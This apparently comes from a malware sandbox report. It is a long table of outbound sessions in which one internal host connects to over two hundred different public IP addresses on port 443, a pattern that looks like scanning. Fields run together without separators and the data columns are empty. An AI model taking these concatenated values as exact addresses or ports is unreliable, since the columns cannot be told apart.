                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10189192.168.2.2342294142.153.171.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10190192.168.2.2334710210.242.49.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10191192.168.2.23366228.63.166.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10192192.168.2.2350648176.131.48.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10193192.168.2.234149696.18.153.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10194192.168.2.2356698174.205.17.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10195192.168.2.234756652.76.141.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10196192.168.2.23347469.23.35.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10197192.168.2.2341416183.122.217.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10198192.168.2.2336538118.157.45.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10199192.168.2.233416262.184.205.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10200192.168.2.2341934112.225.25.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10201192.168.2.234279048.204.12.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10202192.168.2.234783059.24.51.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10203192.168.2.233677861.17.29.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10204192.168.2.2346016135.196.78.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10205192.168.2.2336550216.161.247.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10206192.168.2.2334350139.224.23.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10207192.168.2.2357502185.231.191.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10208192.168.2.2342848200.131.250.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10209192.168.2.2338008200.44.163.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10210192.168.2.2333428153.124.39.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10211192.168.2.233444434.91.218.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10212192.168.2.2355150113.141.241.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10213192.168.2.2339218149.245.137.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10214192.168.2.2354834153.251.60.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10215192.168.2.235138025.159.209.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10216192.168.2.236081859.150.152.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10217192.168.2.2350074178.172.118.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10218192.168.2.2353082185.85.94.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10219192.168.2.2344198123.231.90.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10220192.168.2.234134462.92.135.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10221192.168.2.2347434197.72.154.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10222192.168.2.233629048.63.232.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10223192.168.2.2334298117.110.208.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10224192.168.2.233612891.100.66.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10225192.168.2.2337526182.63.18.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10226192.168.2.23466864.137.214.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10227192.168.2.234125048.200.111.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10228192.168.2.2358802112.180.55.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10229192.168.2.2347848125.123.8.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10230192.168.2.2353904182.70.162.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10231192.168.2.234984270.25.170.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10232192.168.2.2353254166.95.251.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10233192.168.2.233887224.248.175.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10234192.168.2.2342032112.72.141.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10235192.168.2.235943860.31.48.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10236192.168.2.2358240217.143.158.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10237192.168.2.2356600204.221.94.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10238192.168.2.234940040.196.94.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10239192.168.2.2350262155.146.62.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10240192.168.2.2349810122.218.228.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10241192.168.2.235402050.255.56.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10242192.168.2.235344463.73.42.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10243192.168.2.23388224.116.63.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10244192.168.2.2338134203.86.14.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10245192.168.2.235350892.31.160.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10246192.168.2.2339622185.130.9.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10247192.168.2.2334396195.238.104.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10248192.168.2.234324882.219.53.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10249192.168.2.235077420.18.228.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10250192.168.2.235092081.213.133.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10251192.168.2.235731262.244.169.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10252192.168.2.234571663.35.191.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10253192.168.2.235053464.24.107.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10254192.168.2.233340691.18.189.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10255192.168.2.2353818165.153.42.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10256192.168.2.2349368104.250.175.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10257192.168.2.233831412.240.78.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10258192.168.2.233430692.66.185.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10259192.168.2.2348466162.193.254.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10260192.168.2.234480098.152.152.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10261192.168.2.2337744201.28.218.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10262192.168.2.2339678205.66.105.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10263192.168.2.233628459.74.48.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10264192.168.2.2356532151.215.164.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10265192.168.2.2337318208.152.138.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10266192.168.2.2343314104.83.102.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10267192.168.2.235218623.49.57.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10268192.168.2.2356634126.130.133.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10269192.168.2.2342834151.108.217.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10270192.168.2.233665043.182.146.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10271192.168.2.2348284133.114.235.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10272192.168.2.2352792194.143.69.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10273192.168.2.2341156139.62.27.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10274192.168.2.2347756136.54.16.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10275192.168.2.2344914111.119.165.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10276192.168.2.2334478201.246.98.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10277192.168.2.233659435.43.192.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10278192.168.2.235400886.217.238.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10279192.168.2.235072467.18.8.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10280192.168.2.2339076122.147.5.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10281192.168.2.235376485.21.78.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10282192.168.2.2355378165.146.115.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10283192.168.2.2348628141.87.226.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10284192.168.2.2359524158.47.112.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10285192.168.2.2358740153.74.148.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10286192.168.2.234302636.207.117.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10287192.168.2.234162684.29.240.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10288192.168.2.233840696.18.73.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10289192.168.2.2354526189.186.24.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10290192.168.2.2346956124.178.137.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10291192.168.2.2358264192.16.13.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10292192.168.2.2333830143.136.7.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10293192.168.2.233882413.221.107.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10294192.168.2.235943239.215.83.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10295192.168.2.234852048.78.34.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10296192.168.2.234592413.77.184.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10297192.168.2.2356464134.198.51.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10298192.168.2.2359356162.241.96.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10299192.168.2.233446019.207.145.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10300192.168.2.2339250119.252.24.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10301192.168.2.2337582209.109.199.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10302192.168.2.2359106155.21.141.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10303192.168.2.2336696101.103.159.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10304192.168.2.2354736198.207.16.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10305192.168.2.2349742126.169.158.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10306192.168.2.235120087.98.40.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10307192.168.2.2357788143.150.143.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10308192.168.2.235492414.26.180.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10309192.168.2.233648077.244.211.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10310192.168.2.236010223.127.177.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10311192.168.2.2336884137.199.55.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10312192.168.2.233796482.103.212.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10313192.168.2.235795254.20.9.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10314192.168.2.2342506212.155.248.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10315192.168.2.2359028197.55.190.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10316192.168.2.235200445.117.136.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10317192.168.2.235620613.128.119.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10318192.168.2.235192036.99.226.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10319192.168.2.2358414125.164.151.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10320192.168.2.2344786150.155.23.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10321192.168.2.2353228119.78.12.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10322192.168.2.234391077.46.212.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10323192.168.2.2339002206.114.51.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10324192.168.2.2348972185.64.50.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10325192.168.2.234875875.220.5.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10326192.168.2.235220631.124.47.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10327192.168.2.233524450.56.60.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10328192.168.2.234794020.224.18.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10329192.168.2.233524464.182.119.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10330192.168.2.2358854184.112.228.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10331192.168.2.2356474221.148.118.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10332192.168.2.234001236.70.240.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10333192.168.2.234099465.172.77.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10334192.168.2.2340200114.48.24.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10335192.168.2.233841261.237.77.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10336192.168.2.233531270.159.242.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10337192.168.2.233375878.192.179.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10338192.168.2.233527866.140.237.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10339192.168.2.2342596105.49.167.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10340192.168.2.235571069.104.62.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10341192.168.2.2351644161.39.136.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10342192.168.2.233797048.129.32.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10343192.168.2.2342092212.246.49.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10344192.168.2.2337416151.175.36.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10345192.168.2.2333972188.52.156.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10346192.168.2.2360022161.23.117.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10347192.168.2.235175047.33.177.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10348192.168.2.2351848117.203.46.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10349192.168.2.234311289.173.68.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10350192.168.2.235552689.22.18.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10351192.168.2.2354078162.46.8.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10352192.168.2.2342042149.217.175.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10353192.168.2.234896086.174.127.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10354192.168.2.233385485.211.46.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10355192.168.2.2359842109.58.1.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10356192.168.2.2358802123.55.195.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10357192.168.2.2349314186.239.253.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10358192.168.2.2348872174.42.52.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10359192.168.2.234483669.228.244.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10360192.168.2.233676859.27.147.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10361192.168.2.235717039.136.157.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10362192.168.2.2358990185.203.10.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10363192.168.2.2335702141.99.169.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10364192.168.2.2337050220.221.198.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10365192.168.2.235941060.82.91.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10366192.168.2.2338072158.219.23.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10367192.168.2.235002223.164.102.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10368192.168.2.2350278130.225.219.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10369192.168.2.2359408206.31.127.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10370192.168.2.236095676.97.209.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10371192.168.2.235903443.148.167.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10372192.168.2.2349130148.205.95.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10373192.168.2.235259860.87.164.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10374192.168.2.2357958199.181.232.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10375192.168.2.2346202129.111.27.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10376192.168.2.2341348146.164.201.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10377192.168.2.2346402211.169.231.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10378192.168.2.23343869.76.20.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10379192.168.2.2352606210.223.200.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10380192.168.2.235599091.95.227.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10381192.168.2.2343264108.83.4.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10382192.168.2.2355204196.59.28.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10383192.168.2.2344872108.248.188.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10384192.168.2.2345638141.62.102.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10385192.168.2.2357092187.119.125.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10386192.168.2.2359262196.241.130.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10387192.168.2.2343300121.1.208.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10388192.168.2.234291473.98.64.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10389192.168.2.2356516172.255.60.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10390192.168.2.234945041.157.104.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10391192.168.2.235974251.193.97.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10392192.168.2.235396865.175.92.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10393192.168.2.2335886199.100.139.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10394192.168.2.236057471.40.207.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10395192.168.2.2354290192.107.104.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10396192.168.2.2336080192.162.6.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10397192.168.2.234221442.69.113.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10398192.168.2.2357010105.188.124.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10399192.168.2.233462027.61.145.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10400192.168.2.235251427.181.141.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10401192.168.2.235493035.40.171.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10402192.168.2.2352352183.167.147.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10403192.168.2.2344504185.205.22.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10404192.168.2.234179645.196.9.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10405192.168.2.2352472150.171.17.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10406192.168.2.2344708131.147.13.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10407192.168.2.23369149.202.249.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10408192.168.2.2347406186.228.64.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10409192.168.2.233958054.250.39.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10410192.168.2.2348810137.54.89.73443
